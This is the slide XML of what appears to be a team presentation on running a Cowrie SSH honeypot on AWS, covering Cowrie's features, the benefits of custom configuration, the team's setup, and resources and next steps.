          </a:solidFill>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Shape 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3657540" y="4809411"/>
            <a:ext cx="680442" cy="680442"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 134383"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="58FF0D"/>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61614" y="5013484"/>
            <a:ext cx="272177" cy="272177"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="Text 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1051084" y="5716548"/>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Can view real-time attacks in terminal</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1750" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="Shape 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7428548" y="5149572"/>
            <a:ext cx="6407944" cy="1550075"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 9439"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="030303"/>
          </a:solidFill>
          <a:ln/>
          <a:effectLst>
            <a:outerShdw dist="20320" dir="2700000" algn="bl" rotWithShape="0">
              <a:srgbClr val="3B3B3B">
                <a:alpha val="100000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="Shape 18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7428548" y="5119092"/>
            <a:ext cx="6407944" cy="121920"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 279070"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="58FF0D"/>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="Shape 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10292298" y="4809411"/>
            <a:ext cx="680442" cy="680442"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 134383"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="58FF0D"/>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>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6371" y="5013484"/>
            <a:ext cx="272177" cy="272177"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="Text 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7685842" y="5716548"/>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Discord alerts configured (optional for personal instances)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244322"/>
            <a:ext cx="653391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DM Sans Semi Bold" pitchFamily="34" charset="0"/>
                <a:ea typeface="DM Sans Semi Bold" pitchFamily="34" charset="-122"/>
                <a:cs typeface="DM Sans Semi Bold" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Resources &amp; Next Steps</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406729"/>
            <a:ext cx="566976" cy="566976"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="793790" y="32571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GitHub repo</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="793790" y="3747611"/>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github.com/DadOpsMateoMaddox/AWSHoneypot</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2406729"/>
            <a:ext cx="566976" cy="566976"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Text 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5235893" y="32571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Documentation</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Text 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5235893" y="374761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Complete guides in 03-Team-Tutorials</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2406729"/>
            <a:ext cx="566976" cy="566976"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Text 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9677995" y="3257193"/>
            <a:ext cx="393382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Shared production honeypot</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Text 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9677995" y="374761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44.218.220.47:2222</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927044"/>
            <a:ext cx="566976" cy="566976"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Text 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="793790" y="57775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Next meeting</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Text 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="793790" y="6267926"/>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FEFEFE"/>
                </a:solidFill>
                <a:latin typeface="DM Sans" pitchFamily="34" charset="0"/>
                <a:ea typeface="DM Sans" pitchFamily="34" charset="-122"/>
                <a:cs typeface="DM Sans" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Sprint review and demo</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5893" y="4927044"/>
            <a:ext cx="566976" cy="566976"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Text 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5235893" y="5777508"/>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FEFEFE"/>
                </a:solidFill>
                <a:latin typeface="DM Sans Semi Bold" pitchFamily="34" charset="0"/>
                <a:ea typeface="DM Sans Semi Bold" pitchFamily="34" charset="-122"/>
                <a:cs typeface="DM Sans Semi Bold" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Questions and troubleshooting</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Text 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5235893" y="6622256"/>
            <a:ext cx="4158615"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1516" y="551140"/>
            <a:ext cx="5812036" cy="407194"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPts val="3200"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2550" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="DM Sans Semi Bold" pitchFamily="34" charset="0"/>
                <a:ea typeface="DM Sans Semi Bold" pitchFamily="34" charset="-122"/>
                <a:cs typeface="DM Sans Semi Bold" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Understanding Cowrie SSH Honeypot</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2550" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Shape 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="701516" y="1218843"/>
            <a:ext cx="13227368" cy="781764"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 25000"/>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4" name="Shape 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="716756" y="1234083"/>
            <a:ext cx="521137" cy="751284"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 33994"/>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824" y="1511975"/>
            <a:ext cx="195382" cy="195382"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Text 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1368147" y="1364337"/>
            <a:ext cx="1628656" cy="203597"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPts val="1600"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1250" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FEFEFE"/>
                </a:solidFill>
                <a:latin typeface="DM Sans Semi Bold" pitchFamily="34" charset="0"/>
                <a:ea typeface="DM Sans Semi Bold" pitchFamily="34" charset="-122"/>
                <a:cs typeface="DM Sans Semi Bold" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>What is Cowrie?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1250" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Text 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1368147" y="1646039"/>
            <a:ext cx="12415242" cy="208359"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPts val="1600"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FEFEFE"/>
                </a:solidFill>
                <a:latin typeface="DM Sans" pitchFamily="34" charset="0"/>
                <a:ea typeface="DM Sans" pitchFamily="34" charset="-122"/>
                <a:cs typeface="DM Sans" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Medium-interaction SSH/Telnet honeypot written in Python</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Shape 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="701516" y="2130862"/>
            <a:ext cx="13227368" cy="781764"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 25000"/>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9" name="Shape 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="716756" y="2146102"/>
            <a:ext cx="521137" cy="751284"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 33994"/>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824" y="2423993"/>
            <a:ext cx="195382" cy="195382"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Text 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1368147" y="2276356"/>
            <a:ext cx="1628656" cy="203597"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPts val="1600"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1250" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FEFEFE"/>
                </a:solidFill>
                <a:latin typeface="DM Sans Semi Bold" pitchFamily="34" charset="0"/>
                <a:ea typeface="DM Sans Semi Bold" pitchFamily="34" charset="-122"/>
                <a:cs typeface="DM Sans Semi Bold" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>History</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1250" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Text 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1368147" y="2558058"/>
            <a:ext cx="12415242" cy="208359"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPts val="1600"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FEFEFE"/>
                </a:solidFill>
                <a:latin typeface="DM Sans" pitchFamily="34" charset="0"/>
                <a:ea typeface="DM Sans" pitchFamily="34" charset="-122"/>
                <a:cs typeface="DM Sans" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Originally forked from Kippo in 2015, now the industry standard</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Shape 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="701516" y="3042880"/>
            <a:ext cx="13227368" cy="1796891"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 10877"/>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14" name="Shape 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="716756" y="3058120"/>
            <a:ext cx="521137" cy="1766411"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 33994"/>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824" y="3843576"/>
            <a:ext cx="195382" cy="195382"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Text 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1368147" y="3188375"/>
            <a:ext cx="2128242" cy="203597"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPts val="1600"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1250" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FEFEFE"/>
                </a:solidFill>
                <a:latin typeface="DM Sans Semi Bold" pitchFamily="34" charset="0"/>
                <a:ea typeface="DM Sans Semi Bold" pitchFamily="34" charset="-122"/>
                <a:cs typeface="DM Sans Semi Bold" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Why teams choose Cowrie:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1250" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Text 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1368147" y="3470077"/>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Realistic Linux shell emulation</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Text 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1368147" y="3724037"/>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Complete session recording and playback</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Text 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1368147" y="3977997"/>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Extensive logging in multiple formats (JSON, CEF, etc.)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Text 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1368147" y="4231958"/>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Active development community and regular updates</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Text 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1368147" y="4485918"/>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Plugin architecture for extensibility</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="Shape 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="701516" y="4970026"/>
            <a:ext cx="13227368" cy="1796891"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 10877"/>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23" name="Shape 18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="716756" y="4985266"/>
            <a:ext cx="521137" cy="1766411"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 33994"/>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824" y="5770721"/>
            <a:ext cx="195382" cy="195382"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="Text 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1368147" y="5115520"/>
            <a:ext cx="2611636" cy="203597"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPts val="1600"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1250" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FEFEFE"/>
                </a:solidFill>
                <a:latin typeface="DM Sans Semi Bold" pitchFamily="34" charset="0"/>
                <a:ea typeface="DM Sans Semi Bold" pitchFamily="34" charset="-122"/>
                <a:cs typeface="DM Sans Semi Bold" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Benefits of custom configuration:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1250" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Text 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1368147" y="5397222"/>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Default configs are easily fingerprinted by attackers</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="Text 21"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1368147" y="5651183"/>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Custom filesystem layouts increase believability</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Text 22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1368147" y="5905143"/>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Tailored credential lists match your organization</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="Text 23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1368147" y="6159103"/>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Modified banners and prompts avoid detection</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="Text 24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1368147" y="6413063"/>
            <a:ext cx="12415242" cy="208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EFEFE"/>
                </a:solidFill>
                <a:latin typeface="DM Sans" pitchFamily="34" charset="0"/>
                <a:ea typeface="DM Sans" pitchFamily="34" charset="-122"/>
                <a:cs typeface="DM Sans" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Adjusted timeouts and algorithms improve realism</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="Shape 25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="701516" y="6897172"/>
            <a:ext cx="13227368" cy="781764"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 25000"/>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32" name="Shape 26"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="716756" y="6912412"/>
            <a:ext cx="521137" cy="751284"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 33994"/>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33"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5824" y="7190303"/>
            <a:ext cx="195382" cy="195382"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34" name="Text 27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1368147" y="7042666"/>
            <a:ext cx="1628656" cy="203597"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPts val="1600"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1250" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FEFEFE"/>
                </a:solidFill>
                <a:latin typeface="DM Sans Semi Bold" pitchFamily="34" charset="0"/>
                <a:ea typeface="DM Sans Semi Bold" pitchFamily="34" charset="-122"/>
                <a:cs typeface="DM Sans Semi Bold" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Our Cowrie setup:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1250" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="Text 28"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1368147" y="7324368"/>
            <a:ext cx="12415242" cy="208359"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPts val="1600"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FEFEFE"/>
                </a:solidFill>
                <a:latin typeface="DM Sans" pitchFamily="34" charset="0"/>
                <a:ea typeface="DM Sans" pitchFamily="34" charset="-122"/>
                <a:cs typeface="DM Sans" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>v2.5.0 with hardened config, 600s timeout, JSON logging, realistic filesystem</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4733" y="569357"/>
